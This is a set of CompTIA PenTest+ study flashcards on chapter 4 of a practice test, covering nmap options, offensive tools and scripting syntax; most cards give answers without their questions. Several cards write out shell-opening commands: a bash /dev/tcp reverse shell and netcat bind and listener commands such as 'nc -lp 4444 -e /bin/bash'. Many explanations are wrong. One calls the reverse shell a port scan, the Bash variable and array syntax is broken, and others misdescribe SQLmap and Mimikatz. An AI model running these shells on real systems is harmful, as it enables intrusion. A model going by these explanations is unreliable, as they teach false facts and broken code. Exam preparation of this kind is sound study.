CompTIA PenTest+ Practice Test Chapter 4 Penetration Testing Tools (Sybex: Panek, Crystal, Tracy) Flashcards

Question

A penetration tester wants to run a port scan on all hosts on the 192.168.1.0 subnet (with a subnet mask of 255.255.255.0) without actually discovering the hosts first. Which command should she use? A.nmap 192.168.1.0/24 -Pn B.nmap 192.168.1.0/24 -sL C.nmap 192.168.1.0/24 -sn D.nmap 192.168.1.0/24 -n

Answer 1

A.nmap 192.168.1.0/24 -Pn Explanation: The -Pn option tells nmap to scan a host (or an entire subnet) without actually discovering hosts. This type of scan should be avoided during a penetration test because it takes a long time; each port on each IP address in the range is scanned, regardless of whether the IP address is valid. Because of this, it also creates a tremendous amount of traffic that may be detected by an IDS or IPS tool.

Answer 2

A.-T1 Explanation: The –T1 option tells nmap to scan in sneaky mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.

Answer 3

D.-T4 Explanation: The –T4 option tells nmap to scan in aggressive mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target’s IT staff.

Answer 4

C.-T3 Explanation: If the nmap command is run without specifying a timing option, then the –T3 option is used by default. This tells nmap to scan in normal mode.

Answer 5

A.-T0 Explanation: The –T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.

Answer 6

A.-T5 Explanation: The –T5 option causes nmap to scan in insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target’s IT staff.

Answer 7

C.-T2 Explanation: The –T2 option causes nmap to scan in polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.

Answer 8

B.-oN Explanation: The –oN option causes nmap to write the output from the scan to a standard text file. You must specify a filename with this option.

Answer 9

A.-oX Explanation: The –oX option causes nmap to write the output from the scan to an XML-formatted text file. You must specify a filename with this option.

Answer 10

D.-oG Explanation: The –oG option causes nmap to write the output from the scan to a text file in a format that allows it to be quickly searched using the grep command. You must specify a filename with this option.

Answer 11

C.-oA Explanation: The –oA option causes nmap to write the output from the scan to a normal text file, in an XML-formatted text file, and in a greppable text file all at once. You must specify a base filename with this option. A different extension will be added to each of the files generated using this base filename. The normal file will have an .nmap extension, the greppable file will have a .gnmap extension, and the XML file will have an .xml extension.

Answer 12

A.-f Explanation: The –f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.

Answer 13

B.-D Explanation: The –D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.

Answer 14

D.-iR Explanation: The –iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the –iR 50 option with the nmap command.

Answer 15

C.-F Explanation: The –F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.

Answer 16

A.--proxies Explanation: The --proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.

Answer 17

A.nmap 10.0.0.1 B.nmap 10.0.0.1 -sS Explanation: In this example, the nmap utility was used to run a TCP SYN scan. Both the nmap 10.0.0.1 and nmap 10.0.0.1 –sS commands can be used to run this kind of scan.

Answer 18

B.nmap 10.0.0.1 -sT Explanation: In this example, the nmap utility was used to run a TCP connect scan. The nmap 10.0.0.1 –sT command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan.

Answer 19

C.nmap 10.0.0.1 -sU Explanation: In this example, the nmap utility was used to run a UDP scan. The nmap 10.0.0.1 –sU command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan; however, it lists UDP ports instead of TCP ports.

Answer 20

A.nmap 10.0.0.1 -sA Explanation: In this example, the nmap utility was used to run a TCP ACK port scan. The nmap 10.0.0.1 –sA command can be used to run this kind of scan.

Answer 21

A.nmap 10.0.0.5 -v Explanation: In this example, the nmap utility was used to run a TCP SYN scan. However, the –v option was included to increase the verboseness of the output.

Answer 22

C.nmap 10.0.0.5 –sU -vv Explanation: In this example, the nmap utility was used to run a UDP scan. However, the –vv option was included to greatly increase the verboseness of the output.

Answer 23

B.nmap 10.0.0.1-10 -sL Explanation: In this example, the nmap utility was used to simply list available targets. This is done by running nmap with the –sL option. This causes nmap to list hosts, but not actually scan them.

Answer 24

C.nmap 10.0.0.1-10 –sn Explanation: In this example, the nmap utility was used to discover available targets. This is done by running nmap with the –sn option. This causes nmap to discover hosts, but not actually scan any of their ports.

Answer 25

A.nmap 10.0.0.1-10 –p 80 Explanation: In this example, the nmap utility was used to scan port 80 on each of the 10 hosts listed in the range of IP addresses. This is done by running nmap with the –p

Answer 26

C.nmap 10.0.0.5 –sV Explanation: In this example, the nmap utility was used to scan the open ports on the host listed in the command and then determine the version of the service using each of those ports. This is done by running nmap with the –sV option.

Answer 27

A.whois D.nslookup Explanation: The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.

Answer 28

B.nmap C.hping Explanation: The nmap and hping utilities can be used to actively enumerate and fingerprint target systems.

Answer 29

A.John the Ripper B.Cain and Abel Explanation: John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.

Answer 30

D.OWASP ZAP E.Nessus Explanation: OWASP ZAP as well as Nessus can be used to scan a target for vulnerabilities.

Answer 31

B.SQLmap Explanation: SQLmap can be used to brute-force crack the password for an SQL database.

Answer 32

A.Mimikatz Explanation: Mimikatz can be used to compromise Kerberos-based authentication systems, including generating “golden” and “silver” Kerberos tickets.

Answer 33

A.Nikto C.W3AF Explanation: Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.

Answer 34

D.Medusa E.Hydra Explanation: Both Medusa and Hydra utilities can be used to conduct brute-force password attacks.

Answer 35

B.Patator D.Aircrack-ng Explanation: Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.

Answer 36

C.Empire D.PowerSploit Explanation: Both Empire and PowerSploit utilities are based on Windows PowerShell. Essentially, they are a collection of

Answer 37

B.SET Explanation: The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.

Answer 38

A.BeEF Explanation: The Browser Exploitation Framework (BeEF) is a penetration testing utility designed to exploit weaknesses in web browsers using client-side attacks.

Answer 39

D.ncat Explanation: The ncat utility can be used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.

Answer 40

A.IDA B.Hopper Explanation: Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.

Answer 41

C.foremost E.FTK Explanation: Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.

Answer 42

A.Nikto Explanation: Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.

Answer 43

D.proxychains Explanation: The proxychains tool allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.

Answer 44

A.APK Studio D.APKX Explanation: Both APK Studio and APKX can be used to debug or even decompile an Android executable.

Answer 45

A.AFL D.Peach Explanation: Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.

Answer 46

A.Findsecbugs B.YASCA Explanation: Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.

Answer 47

C.hashcat Explanation: The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.

Answer 48

A.Hydra E.Medusa Explanation: The many unsuccessful login attempts is a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.

Answer 49

B.Medusa Explanation: This output was created by the Medusa utility. Medusa is a brute-force password cracking tool that sends one password after another to a given user account (administrator, in this case) in hopes of finding the right one.

Answer 50

B.CeWL Explanation: The CeWL utility can be configured to crawl the target organization’s website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.

Answer 51

D.Dirbuster Explanation: The Dirbuster utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.

Answer 52

A.John the Ripper Explanation: This output was created by John the Ripper. This credential testing tool is a brute-force password cracking utility. In this example, the root user’s password (toor) has been discovered.

Answer 53

A.whois Explanation: This output was created by the whois utility. This OSINT tool is used to gather public information about the target organization’s domain.

Answer 54

D.WiFite E.Kismet Explanation: You could use either Kismet or WiFite to try to break the target organization’s wireless network. You could also use Aircrack-ng to accomplish this.

Answer 55

B.Burp Suite C.OWASP ZAP Explanation: You could use either Burp Suite or OWASP ZAP. Both of these tools could be used to intercept network traffic flowing between users running a web browser and the target organization’s web application server. By proxying a connection, the penetration tester can read the contents of the intercepted traffic.

Answer 56

A.netcat Explanation: The netcat utility could be used to set up a reverse shell exploit that allows the tester to remotely control the compromised system.

Answer 57

D.ncat Explanation: The ncat utility is an updated and improved version of the older netcat utility.

Answer 58

A.ncat B.netcat Explanation: Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.

Answer 59

C.Drozer Explanation: The Drozer utility provides a complete security auditing and attack framework designed exclusively for mobile devices running the Android operating system.

Answer 60

B.APK Studio Explanation: APK Studio is a tool that you can use to reverse engineer an APK executable and analyze it for vulnerabilities.

Answer 61

A.APKX Explanation: Android APK Decompilation for the Lazy (APKX) is a Python wrapper that can extract Java source code directly from an Android APK executable.

Answer 62

D.Searchsploit Explanation: The searchsploit utility is a command-line search tool that is used to query the online Exploit-DB database for known exploits.

Answer 63

D.Responder Explanation: The responder utility can be used to conduct LLMNR and NBT-NS poisoning, potentially allowing the penetration tester to redirect clients to her laptop and capture their credentials in the form of usernames and hashed passwords.

Answer 64

C.Impacket Explanation: The impacket penetration testing tool consists of a collection of Python classes used for low-level access to network protocols, such as SMB and MSRPC protocols.

Answer 65

A.Metasploit Framework Explanation: The Metasploit Framework (MSF) penetration testing tool provides a huge number of exploits that can be used to compromise the target organization’s network.

Answer 66

B.Bash D.Python Explanation: When declaring a variable, both Bash and Python use the same syntax: variable_name = value

Answer 67

A.PowerShell C.Ruby Explanation: When declaring a variable, PowerShell uses a syntax of $variable_name = value. Ruby uses the same syntax when declaring a global variable.

Answer 68

C.Ruby Explanation: When declaring a local variable, Ruby uses a syntax of _variable_name = value.

Answer 69

C.Ruby D.Python Explanation: When declaring an array, both Ruby and Python use the same syntax: array_name = [value1, value2, value3, ...].

Answer 70

B.Bash Explanation: When declaring an array, Bash uses the following syntax: array_name = (value1, value2, value3, ...).

Answer 71

A.PowerShell Explanation: When declaring an array, PowerShell uses the following syntax: $array_name = @(value1, value2, value3, ...).

Answer 72

B.Bash Explanation: When referencing the value of a variable, Bash uses the following syntax: {$variable_name}. In this example, the echo command is being told to display the value of the variable named ServerName on the screen.

Answer 73

B.Bash Explanation: When referencing a value from an array, Bash uses the following syntax: {$array_name[position]}. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 74

A.PowerShell Explanation: When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.

Answer 75

D.Python Explanation: When referencing a value from an array, Python uses the following syntax: (array_name[position]). In this example, the print command is being told to print the second value of the array named PrimeNumArray

Answer 76

C.Ruby Explanation: When referencing a value from an array, Ruby uses the following syntax: array_name[position]. In this example, the puts command is being told to use the second value of the array named PrimeNumArray.

Answer 77

A.Target[HostName] = FS1 Explanation: When creating an associative array in a Bash script, you use the following syntax: array_name[element_name] = value. In this example, the line Target[HostName] = FS1 assigns a value of FS1 to the element named HostName within the Target array.

Answer 78

D._Target = {"HostName" => "FS1"} Explanation: When creating an associative array in a Ruby script, you use the following syntax: _array_name = {"element_name" => "value"} . In this example, the line _Target = {"HostName" => "FS1"} assigns a value of FS1 to the element named HostName within the Target array.

Answer 79

C.$Target.HostName = 'FS1' Explanation: When creating an associative array in a PowerShell script, you use the following syntax: $array_name.element_name = "value" . In this example, the line $Target.HostName = 'FS1' assigns a value of FS1 to the element named HostName within the Target array.

Answer 80

B.Target = [{"HostName":"FS1"}] Explanation: When creating an associative array in a PowerShell script, you use the following syntax: array_name = [{"element_name":"value"}]. In this example, the line Target = [{"HostName":"FS1"}] assigns a value of FS1 to the element named HostName within the Target array.

Answer 81

B.== Explanation: When making a comparison between two values in a Ruby script to see whether they are equal, you use the == relational operator.

Answer 82

A.<> D.!= Explanation: When making a comparison between two values in a Python script to see whether they are not equal, you can use either the <> or the != relational operator.

Answer 83

B.== Explanation: When making a comparison between two values in a Python script to see whether they are equal, you use the == relational operator.

Answer 84

C.-eq Explanation: When making a comparison between two values in a PowerShell script to see if they are equal, you use the -eq relational operator.

Answer 85

C.-gt Explanation: When making a comparison between two integer values in a Bash script to see whether one is greater than the other, you use the -gt relational operator.

Answer 86

A.> Explanation: The > relational operator can be used in both Python and Ruby to test whether one value is numerically greater than the other.

Answer 87

C.-ge Explanation: The -ge relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other.

Answer 88

B.-gt Explanation: The -gt relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than the other.

Answer 89

A.>= Explanation: The >= relational operator can be used in both Python and Ruby to test whether one value is numerically greater than or equal to the other.

Answer 90

B.-lt Explanation: The -lt relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than the other.

Answer 91

D.< Explanation: The < relational operator can be used in both Python and Ruby to test whether one value is numerically less than the other.

Answer 92

C.-le Explanation: The -le relational operator can be used in both Bash and PowerShell to test whether one value is numerically less than or equal to the other.

Answer 93

A.<= Explanation: The <= relational operator can be used in both Python and Ruby to test whether one value is numerically less than or equal to the other.

Answer 94

B.read TargetHost Explanation: Adding the read TargetHost line to a Bash script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 95

A.echo $TargetHost Explanation: Adding the echo $TargetHost line to a Bash script causes it to display the value of a variable named TargetHost on the screen.

Answer 96

C.test Explanation: The test command can be used from within an if/then flow control structure to evaluate whether a specified condition is true.

Answer 97

A.Ruby Explanation: An if/then flow control structure in Ruby uses the following syntax: if condition commands... else commands... end

Answer 98

B.PowerShell Explanation: An if/then flow control structure in PowerShell uses the following syntax: if condition { commands... } Else { commands... }

Answer 99

C.Bash Explanation: An if/then flow control structure in Bash uses the following syntax: ``` if condition then commands... else commands... fi ```

Answer 100

E.case Explanation: The case structure is the best option presented to evaluate the user’s choice of multiple selections and run the appropriate set of commands as a result.

Answer 101

A.while loop Explanation: A while loop will keep processing over and over until the specified condition evaluates to false.

Answer 102

D.if/then/else Explanation: The if/then/else structure is considered to be a flow control structure because it branches the script in one of several directions based on how a specified condition evaluates.

Answer 103

C.until loop Explanation: The until looping structure will keep processing over and over as long as the specified condition evaluates to false.

Answer 104

B.for loop Explanation: The for looping structure will process a specified number of times.

Answer 105

D.$TargetHost = read-host -Prompt Explanation: Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 106

A.echo $TargetHost Explanation: Adding the echo $TargetHost line to a PowerShell script causes it to display the value of a variable named TargetHost on the screen.

Answer 107

C.TargetHost = gets Explanation: Adding the TargetHost = gets line to a Ruby script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 108

D.puts TargetHost Explanation: Adding the puts TargetHost line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 109

A.TargetHost = input('Please enter a hostname:') Explanation: Adding the TargetHost = input('Please enter a hostname:') line to a Python script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.

Answer 110

B.print (TargetHost) Explanation: Adding the print (TargetHost) line to a Ruby script causes it to display the value of a variable named TargetHost on the screen.

Answer 111

B.#!/bin/bash Explanation: The #!/bin/bash element must be included at the beginning of every Bash shell script.

Answer 112

A.Enter /bin/bash ~/myexploit at the shell prompt. E.Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt. Explanation: E.Enter chmod u+x ~/ myexploit; then enter ~/ myexploit at the shell prompt.

Answer 113

B.declare –i TOTAL Explanation: The declare –i TOTAL command will create the TOTAL variable and type it as integer.

Answer 114

C.tail /var/log/firewall 1> lastevents 2> &1 Explanation: Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a bash script will send both stdout and stout and stderr to the same file

Answer 115

D.Responder Explanation: Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allows you to ananlyze or response to NetBIOS name services pretending to be the system that the query is intended forD

Answer 116

C.Maltego E.Shodan Explanation: There are a variety of tools that assist with this OSINT collection: Censys is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine Fingerprinting Organizations with Collected Archives (FOCA) is an open source tool used to find metadata within Office documents, PDFs, and other common file formats. Maltego is a commercial product that assists with the visualization of data gathered from OSINT efforts. nslookup tools help identify the IP addresses associated with an organization. Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work. Shodan is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources. theHarvester scours search engines and other resources to find email addresses, employee names, and infrastructure details about an organization. whois tools gather information from public records about domain ownership.

Answer 117

B.Hydra Explanation: In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

Answer 118

C.Pass the hash ``` Explanation: In this scenario, the tester is using the Metasploit PSEXEC module. Using Metasploit, a tester can exploit a system and perform a hash dump to extract the systems hashes. The tester can then use the PSEXEC module to pass the hash to another system on the network. The example shows how the SMBPASS option is set and the pass-the-hash attack executed, resulting in access to a remote system within the network. A pass-the-hash attack is an exploit in which a tester takes a hashed user credential and, without cracking it, reuses it to deceive an authentication system into creating a new authenticated session on the same network. ```

Answer 119

C.msfconsole Explanation: Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploit-framework/msfconsole directory

Answer 120

B.Mimikatz Explanation: Mimikatz is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket attacks. In this scenario, however, the question states “over the wire.” Mimikatz is the only tool that cannot be used that way.

Answer 121

A.bash -i >& /dev/tcp//443 0>&1 Explanation: A reverse shell opens a communication channel on a port and waits for incoming connections. The client’s machine acts as a server and initiates a connection to the tester’s machine. This is what is done by using the following: bash -i >& /dev/tcp//443 0>&1 Given the options, A is the best option. B and C will not work because they are using the and not the . Option D is not correct because it is using the improper syntax.

Answer 122

A.A port scan has been performed. Explanation: In bash shell, a network socket can be opened to pass data through it. A TCP socket can be opened using /dev/tcp//. Bash is attempting to open a TCP connection to the corresponding socket. So, in this example, a port scan has been performed. Here’s a breakdown of the code: /bin/bash -i invokes an interactive bash shell. > &/dev/tcp// pipes that shell to the tester. 0&1 takes standard input and connects it to standard output. Then it specifies to do the same with standard error (2>).

Answer 123

C.Hydra Explanation: Hydra is designed to include support for NTLM hashes as a password. Hashcat is a password cracking and recovery tool. Drozer is a framework for Android security assessments. Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. Hydra, often known as thc-hydra, is a brute-force dictionary attack tool that is designed to work against a variety of protocols and services.

Answer 124

A.Browser Exploitation Framework (BeEF) Explanation: The Browser Exploitation Framework (BeEF) is designed for this type of attack. BeEF provides an automated toolkit for using social engineering to take over a client’s web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.

Answer 125

A.CeWL Explanation: Custom Word List (CeWL) Generator is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization’s websites can help generate a custom wordlist. Building a custom wordlist can be particularly useful if you have gathered a lot of information about your target organization.

Answer 126

A.It executes a remote script. Explanation: In this scenario, the PowerShell command given will execute a remote script. By using the PowerShell IEX command, it will invoke an expression. The IEX cmdlet evaluates or runs a specified string as a command and returns the results of the expression or command. The PowerShell Invoke-Command cmdlet runs commands on a local or remote computer and returns all output from the commands, including errors. By using a single Invoke-Command command, you can run commands on multiple computers.

Answer 127

A.The organization did not disable Telnet. ``` Explanation: Network Mapper (Nmap) is used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap will identify what devices are running on a client’s systems, discover hosts and services that are available, find open ports, and detect security risks. In this scenario, the organization did not disable Telnet because port 23 is still open. Telnet is a client-server protocol, based on a reliable connection-oriented transport. Typically, this protocol is used to establish a connection to Transmission Control Protocol (TCP) by using port 23, where a Telnet server application (telnetd) is listening. ```

Answer 128

C.TCP SYNs to TCP port 80 Explanation: Hping is a command-line tool that allows testers to generate network traffic. Hping is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks hping to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

Answer 129

A.nc -lp 4444 -e /bin/bash Explanation: Netcat can be used to set up a Telnet server in a matter of seconds. You can specify the shell you want Netcat to run at a successful connection with the -e parameter. In this scenario, the proper syntax would be nc -lp 444 -e /bin/bash. The nc - tells Windows to run the nc.exe file with the following arguments: -l: Listen mode, for inbound connections -p: Specifies a port to listen for a connection on -e: Tells what program to run once the port is connected to (cmd.exe) -v: Specifies to be verbose, printing out messages on Standard Error, such as when a connection occurs

Answer 130

A.-p- 1-65535 Explanation: nmap is the most commonly used command-line vulnerability scanner and is a free, open source tool. It provides a broad range of capabilities, including multiple scan modes intended to bypass firewalls and other network protection devices. nmap is a port scanner. To scan for ports, you will want to use -p (only scan specified ports). This option specifies which ports you want to scan and overrides the default scan. Individual port numbers or ranges are acceptable. Ranges are separated by a hyphen (e.g., 1-1023). The beginning and/or end values of a range may be omitted, causing nmap to use 1 and 65535, respectively. So, you can specify -p- to scan ports from 1 through 65535. Port scanning a system simply requires that nmap be installed and that you provide the target system’s hostname or IP address.

Answer 131

D.Shodan Explanation: Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

Answer 132

D.Secure Shell (SSH) F.Wireshark Explanation: In this scenario, the best options are SSH and Wireshark. Secure Shell (SSH) provides secure encrypted connections between systems. SSH provides remote shell access via an encrypted connection. SSH is used for secure command-line access to systems, typically via TCP port 22, and is found on devices and systems of all types. Because SSH is so common, testing systems that provide an SSH service is a very attractive option for a penetration tester. Wireshark is a protocol analyzer that allows penetration testers to eavesdrop on and dissect network traffic. Wireshark also allows for capturing network traffic from wireless networks.

Answer 133

B.Remove let in front of dest=5+5 C.Change the = to -eq Explanation: Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to an = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

Answer 134

A.$ports = 20, 25, 80, 443 Explanation: PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with $, whether it’s for setting, changing, or retrieving the value stored in that variable.

Answer 135

A.nc -nvlp 443 Explanation: The tester will want to create a Netcat listener that waits for the inbound shell from the target machine. To get a shell, Netcat uses nc -nvlp 443 to listen for incoming connections Using this syntax, the tester is telling Netcat (nc) to not resolve names (-n), to be verbose printing out when a connection occurs (-v), and to listen (-l) on a given local port (-p).

Answer 136

D.Responder Explanation: In this scenario, the question specifically states “name resolution requests.” In this case, Responder is the best choice. Responder is a toolkit used to answer NetBIOS queries from Windows systems on a network. Tcpdump is a type of packet analyzer software utility that monitors and logs TCP/IP traffic passing between a network and the computer on which it is executed. Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. Medusa is a brute-force login attack tool that supports a variety of protocols and services.

Answer 137

A.-iL F.-sV Explanation: One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses. -iL : This is the input from list of hosts/networks. -sV: This probes open ports to determine service/version info.

Answer 138

D.use auxiliary/server/socks4a ``` Explanation: Metasploit is a tool for the development of exploits and the testing of them on live targets. The socks4a auxiliary is a module from within the framework. This auxiliary module provides a proxy server that uses Metasploit Framework routing to relay connections. So, using the use auxiliary/server/socks4a module allows a tester to access a private network from the Internet. ```

Answer 139

A.Impacket Explanation: Impacket is a collection of Python classes for working with network protocols. Impacket provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit’s SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you’ve captured the messages.

Answer 140

B.1,000 Explanation: Using nmap’s basic functionality is quite simple. Port scanning a system just requires that nmap is installed and that you provide the target system’s hostname or IP address. By default, nmap scans the 1,000 most common ports for both TCP and UDP. However, the full range of ports available to both TCP and UDP services is 1–65,535.

Answer 141

B.1 Explanation: In this scenario we are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if..then..else statements.

Answer 142

B.Shodan Explanation: Shodan is a popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. Shodan is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using Shodan for penetration testing requires some basic knowledge of banners including HTTP status codes.

Answer 143

A.Censys Explanation: Much like Shodan, Censys is a security-oriented search engine. When you dig into a host in Censys, you will also discover geoIP information, if it is available, and a comprehensive summary of the services the host exposes providing more detailed information. GeoIP refers to the method of locating a computer terminal’s geographic location by identifying that terminal’s IP address.

Answer 144

C.Sqlmap Explanation: Sqlmap is an open source tool used to automate SQL injection attacks against web applications with database back ends. Sqlmap is a commonly used open source database vulnerability scanner that allows security administrators to probe web applications for database vulnerabilities. For this scenario, Sqlmap is a dedicated database vulnerability scanner and is the most appropriate tool.